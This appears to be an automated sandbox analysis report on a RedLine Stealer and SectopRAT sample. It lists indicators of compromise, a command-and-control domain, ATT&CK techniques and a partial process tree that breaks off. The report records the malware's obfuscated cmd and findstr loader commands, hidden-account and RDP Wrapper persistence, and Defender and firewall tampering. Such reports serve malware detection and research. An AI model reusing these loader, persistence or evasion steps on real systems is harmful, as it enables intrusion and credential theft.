redline | f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14

Analysis

max time kernel
118s
max time network
120s
platform
windows7_x64
resource
win7-20241023-en
resource tags

arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
submitted
22/12/2024, 02:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe
Size

4.1MB
MD5

166ad2bad1b89030246c845ef575cb09
SHA1

5875242be7725edd2fc582350d352496d4da1b56
SHA256

f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14
SHA512

c24e79e0adbcb666ac9ba4839441f787cd10fc98a832ae2ecaaffddfa6ffd455f3121bb634e96651931d994426073084bf35685f0372d5b8794e6654640677ef
SSDEEP

98304:E1E7x7WKpOEYMP8TTjPnPCDexiO75F1Nv6563Y:E1E7x7WFoEWNO1Nxo

Score

10^/10

redline sectoprat ads6 defense_evasion discovery evasion execution infostealer lateral_movement persistence privilege_escalation rat spyware stealer trojan

Malware Config

Extracted

Family

redline

Botnet

ads6

bhajhhsy6.fun:80

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 3 IoCs

resource	yara_rule
behavioral1/memory/2144-70-0x00000000000D0000-0x00000000000EC000-memory.dmp	family_redline
behavioral1/memory/2144-71-0x00000000000D0000-0x00000000000EC000-memory.dmp	family_redline
behavioral1/memory/2144-67-0x00000000000D0000-0x00000000000EC000-memory.dmp	family_redline

Redline family
redline
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 3 IoCs

resource	yara_rule
behavioral1/memory/2144-70-0x00000000000D0000-0x00000000000EC000-memory.dmp	family_sectoprat
behavioral1/memory/2144-71-0x00000000000D0000-0x00000000000EC000-memory.dmp	family_sectoprat
behavioral1/memory/2144-67-0x00000000000D0000-0x00000000000EC000-memory.dmp	family_sectoprat

Sectoprat family
sectoprat
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
1668	net.exe
1520	net1.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
32	1740	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2056	powershell.exe
2080	powershell.exe
2548	powershell.exe
2920	powershell.exe
604	powershell.exe
2176	powershell.exe
2888	powershell.exe
1360	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Modifies Windows Firewall 2 TTPs 5 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1604	netsh.exe
2424	netsh.exe
1748	netsh.exe
2188	netsh.exe
2820	netsh.exe

Server Software Component: Terminal Services DLL 1 TTPs 3 IoCs

persistence

Terminal Services DLL

T1505.005

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe

Executes dropped EXE 13 IoCs

pid	Process
2932	Potere.exe.com
2812	Potere.exe.com
2912	Riscalda.exe.com
2740	Riscalda.exe.com
2688	Desideri.exe.com
2092	Desideri.exe.com
2144	RegAsm.exe
1920	Potere.exe.com
2588	RegAsm.exe
3040	RDPWInst.exe
1752	RDPWInst.exe
1280	RDPWInst.exe
1600	RDPWInst.exe

Loads dropped DLL 13 IoCs

pid	Process
2788	cmd.exe
2788	cmd.exe
2788	cmd.exe
2092	Desideri.exe.com
2740	Riscalda.exe.com
2144	RegAsm.exe
2588	RegAsm.exe
2764	cmd.exe
2764	cmd.exe
2276	Process not Found
2764	cmd.exe
2764	cmd.exe
2712	svchost.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
23	raw.githubusercontent.com
8	raw.githubusercontent.com
9	raw.githubusercontent.com
22	raw.githubusercontent.com

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe

Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
discovery

Password Policy Discovery
T1201

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/memory/2588-80-0x0000000000450000-0x000000000063C000-memory.dmp	autoit_exe
behavioral1/memory/2588-83-0x0000000000450000-0x000000000063C000-memory.dmp	autoit_exe
behavioral1/memory/2588-86-0x0000000000450000-0x000000000063C000-memory.dmp	autoit_exe

Drops file in System32 directory 16 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\dnsrsvlr.log	svchost.exe
File opened for modification	C:\Windows\system32\CatRoot2\edb.chk	svchost.exe
File opened for modification	C:\Windows\system32\CatRoot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\catdb	svchost.exe
File opened for modification	C:\Windows\System32\null	cmd.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\CatRoot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\catdb	svchost.exe
File created	C:\Windows\System32\null	cmd.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\CatRoot2\edb.log	svchost.exe
File opened for modification	C:\Windows\System32\asyncreg.log	svchost.exe

Hide Artifacts: Hidden Users 1 TTPs 2 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\EGocAeBsIQ = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\EGocAeBsIQ = "0"	reg.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2740 set thread context of 2144	2740	Riscalda.exe.com	48
PID 2812 set thread context of 1920	2812	Potere.exe.com	46
PID 2092 set thread context of 2588	2092	Desideri.exe.com	47

Drops file in Program Files directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\RDP Wrapper	RegAsm.exe
File opened for modification	C:\Program Files\RDP Wrapper\RDPWInst.exe	RegAsm.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.bat	RegAsm.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.bat	RegAsm.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\RDPWInst.exe	RegAsm.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2216	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 15 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Desideri.exe.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Desideri.exe.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Riscalda.exe.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Potere.exe.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Potere.exe.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fsutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Riscalda.exe.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	makecab.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2772	PING.EXE

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
2796	timeout.exe
2220	timeout.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2772	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1924	schtasks.exe
2440	schtasks.exe
1712	schtasks.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	32	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
2056	powershell.exe
2080	powershell.exe
2888	powershell.exe
2548	powershell.exe
2712	svchost.exe
2712	svchost.exe
2920	powershell.exe
604	powershell.exe
1360	powershell.exe
2176	powershell.exe

Suspicious behavior: LoadsDriver 4 IoCs

pid	Process
2276	Process not Found
1776	Process not Found
2712	svchost.exe
2712	svchost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2144	RegAsm.exe
Token: SeIncreaseQuotaPrivilege	1796	WMIC.exe
Token: SeSecurityPrivilege	1796	WMIC.exe
Token: SeTakeOwnershipPrivilege	1796	WMIC.exe
Token: SeLoadDriverPrivilege	1796	WMIC.exe
Token: SeSystemProfilePrivilege	1796	WMIC.exe
Token: SeSystemtimePrivilege	1796	WMIC.exe
Token: SeProfSingleProcessPrivilege	1796	WMIC.exe
Token: SeIncBasePriorityPrivilege	1796	WMIC.exe
Token: SeCreatePagefilePrivilege	1796	WMIC.exe
Token: SeBackupPrivilege	1796	WMIC.exe
Token: SeRestorePrivilege	1796	WMIC.exe
Token: SeShutdownPrivilege	1796	WMIC.exe
Token: SeDebugPrivilege	1796	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1796	WMIC.exe
Token: SeRemoteShutdownPrivilege	1796	WMIC.exe
Token: SeUndockPrivilege	1796	WMIC.exe
Token: SeManageVolumePrivilege	1796	WMIC.exe
Token: 33	1796	WMIC.exe
Token: 34	1796	WMIC.exe
Token: 35	1796	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1796	WMIC.exe
Token: SeSecurityPrivilege	1796	WMIC.exe
Token: SeTakeOwnershipPrivilege	1796	WMIC.exe
Token: SeLoadDriverPrivilege	1796	WMIC.exe
Token: SeSystemProfilePrivilege	1796	WMIC.exe
Token: SeSystemtimePrivilege	1796	WMIC.exe
Token: SeProfSingleProcessPrivilege	1796	WMIC.exe
Token: SeIncBasePriorityPrivilege	1796	WMIC.exe
Token: SeCreatePagefilePrivilege	1796	WMIC.exe
Token: SeBackupPrivilege	1796	WMIC.exe
Token: SeRestorePrivilege	1796	WMIC.exe
Token: SeShutdownPrivilege	1796	WMIC.exe
Token: SeDebugPrivilege	1796	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1796	WMIC.exe
Token: SeRemoteShutdownPrivilege	1796	WMIC.exe
Token: SeUndockPrivilege	1796	WMIC.exe
Token: SeManageVolumePrivilege	1796	WMIC.exe
Token: 33	1796	WMIC.exe
Token: 34	1796	WMIC.exe
Token: 35	1796	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2124	WMIC.exe
Token: SeSecurityPrivilege	2124	WMIC.exe
Token: SeTakeOwnershipPrivilege	2124	WMIC.exe
Token: SeLoadDriverPrivilege	2124	WMIC.exe
Token: SeSystemProfilePrivilege	2124	WMIC.exe
Token: SeSystemtimePrivilege	2124	WMIC.exe
Token: SeProfSingleProcessPrivilege	2124	WMIC.exe
Token: SeIncBasePriorityPrivilege	2124	WMIC.exe
Token: SeCreatePagefilePrivilege	2124	WMIC.exe
Token: SeBackupPrivilege	2124	WMIC.exe
Token: SeRestorePrivilege	2124	WMIC.exe
Token: SeShutdownPrivilege	2124	WMIC.exe
Token: SeDebugPrivilege	2124	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2124	WMIC.exe
Token: SeRemoteShutdownPrivilege	2124	WMIC.exe
Token: SeUndockPrivilege	2124	WMIC.exe
Token: SeManageVolumePrivilege	2124	WMIC.exe
Token: 33	2124	WMIC.exe
Token: 34	2124	WMIC.exe
Token: 35	2124	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2124	WMIC.exe
Token: SeSecurityPrivilege	2124	WMIC.exe
Token: SeTakeOwnershipPrivilege	2124	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1628 wrote to memory of 2632	1628	f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe	31
PID 1628 wrote to memory of 2632	1628	f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe	31
PID 1628 wrote to memory of 2632	1628	f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe	31
PID 1628 wrote to memory of 2632	1628	f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe	31
PID 1628 wrote to memory of 1908	1628	f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe	33
PID 1628 wrote to memory of 1908	1628	f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe	33
PID 1628 wrote to memory of 1908	1628	f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe	33
PID 1628 wrote to memory of 1908	1628	f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe	33
PID 1908 wrote to memory of 2788	1908	cmd.exe	35
PID 1908 wrote to memory of 2788	1908	cmd.exe	35
PID 1908 wrote to memory of 2788	1908	cmd.exe	35
PID 1908 wrote to memory of 2788	1908	cmd.exe	35
PID 2788 wrote to memory of 2888	2788	cmd.exe	36
PID 2788 wrote to memory of 2888	2788	cmd.exe	36
PID 2788 wrote to memory of 2888	2788	cmd.exe	36
PID 2788 wrote to memory of 2888	2788	cmd.exe	36
PID 2788 wrote to memory of 2932	2788	cmd.exe	37
PID 2788 wrote to memory of 2932	2788	cmd.exe	37
PID 2788 wrote to memory of 2932	2788	cmd.exe	37
PID 2788 wrote to memory of 2932	2788	cmd.exe	37
PID 2788 wrote to memory of 2828	2788	cmd.exe	38
PID 2788 wrote to memory of 2828	2788	cmd.exe	38
PID 2788 wrote to memory of 2828	2788	cmd.exe	38
PID 2788 wrote to memory of 2828	2788	cmd.exe	38
PID 2932 wrote to memory of 2812	2932	Potere.exe.com	39
PID 2932 wrote to memory of 2812	2932	Potere.exe.com	39
PID 2932 wrote to memory of 2812	2932	Potere.exe.com	39
PID 2932 wrote to memory of 2812	2932	Potere.exe.com	39
PID 2788 wrote to memory of 2912	2788	cmd.exe	40
PID 2788 wrote to memory of 2912	2788	cmd.exe	40
PID 2788 wrote to memory of 2912	2788	cmd.exe	40
PID 2788 wrote to memory of 2912	2788	cmd.exe	40
PID 2788 wrote to memory of 2832	2788	cmd.exe	41
PID 2788 wrote to memory of 2832	2788	cmd.exe	41
PID 2788 wrote to memory of 2832	2788	cmd.exe	41
PID 2788 wrote to memory of 2832	2788	cmd.exe	41
PID 2912 wrote to memory of 2740	2912	Riscalda.exe.com	42
PID 2912 wrote to memory of 2740	2912	Riscalda.exe.com	42
PID 2912 wrote to memory of 2740	2912	Riscalda.exe.com	42
PID 2912 wrote to memory of 2740	2912	Riscalda.exe.com	42
PID 2788 wrote to memory of 2688	2788	cmd.exe	43
PID 2788 wrote to memory of 2688	2788	cmd.exe	43
PID 2788 wrote to memory of 2688	2788	cmd.exe	43
PID 2788 wrote to memory of 2688	2788	cmd.exe	43
PID 2788 wrote to memory of 2772	2788	cmd.exe	44
PID 2788 wrote to memory of 2772	2788	cmd.exe	44
PID 2788 wrote to memory of 2772	2788	cmd.exe	44
PID 2788 wrote to memory of 2772	2788	cmd.exe	44
PID 2688 wrote to memory of 2092	2688	Desideri.exe.com	45
PID 2688 wrote to memory of 2092	2688	Desideri.exe.com	45
PID 2688 wrote to memory of 2092	2688	Desideri.exe.com	45
PID 2688 wrote to memory of 2092	2688	Desideri.exe.com	45
PID 2812 wrote to memory of 1920	2812	Potere.exe.com	46
PID 2812 wrote to memory of 1920	2812	Potere.exe.com	46
PID 2812 wrote to memory of 1920	2812	Potere.exe.com	46
PID 2812 wrote to memory of 1920	2812	Potere.exe.com	46
PID 2092 wrote to memory of 2588	2092	Desideri.exe.com	47
PID 2092 wrote to memory of 2588	2092	Desideri.exe.com	47
PID 2092 wrote to memory of 2588	2092	Desideri.exe.com	47
PID 2092 wrote to memory of 2588	2092	Desideri.exe.com	47
PID 2092 wrote to memory of 2588	2092	Desideri.exe.com	47
PID 2092 wrote to memory of 2588	2092	Desideri.exe.com	47
PID 2092 wrote to memory of 2588	2092	Desideri.exe.com	47
PID 2740 wrote to memory of 2144	2740	Riscalda.exe.com	48

C:\Users\Admin\AppData\Local\Temp\f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe
"C:\Users\Admin\AppData\Local\Temp\f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1628
- C:\Windows\SysWOW64\makecab.exe
  "C:\Windows\System32\makecab.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2632
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c FHaltkaUYOvf & xkCNwAXEEDcq & BsWHxifyTEoE & cmd < Rimasta.xltx
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1908
- - C:\Windows\SysWOW64\cmd.exe
    cmd
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2788
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V /R "^eCkzuUqdlskzCItLydVWjmePsuOjCgqqLCjDWBmSwcPCZRUjAzbZlnrCmvwquNOWdkHqvAPEQrUQKAPAjBMpQwPjnKrAAnLgHSkOp$" Mio.xltx
      4⤵
      System Location Discovery: System Language Discovery
      PID:2888
  - - C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com
      Potere.exe.com A
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2932
    - - C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com
        
        C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com A
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2812
      - C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com
        
        C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com
        6⤵
        Executes dropped EXE
        
